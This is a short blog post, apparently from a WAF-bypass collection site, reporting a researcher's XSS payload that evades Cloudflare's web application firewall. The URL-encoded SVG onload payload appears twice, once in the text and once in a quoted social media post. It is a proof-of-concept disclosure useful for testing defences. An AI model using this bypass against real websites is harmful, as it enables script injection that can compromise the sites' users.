WAF bypass by Dharamveer_____

Date: May 22, 2024Author: wafbypass

A new XSS bypass was discovered for Cloudflare WAF. The payload used for the bypass is %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E. This bypass allows attackers to execute malicious scripts on websites protected by Cloudflare WAF. For more technical details, refer to the blogpost.

New XSS Bypass Cloudflare WAF ?

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

— Dharamveer prasad ( v_3_3_r ) (@Dharamveer_____) May 9, 2024

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools

How to test, evaluate, compare, and bypass web application and API security solutions like WAF, NGWAF, RASP, and WAAP

WAF bypass by Dharamveer_____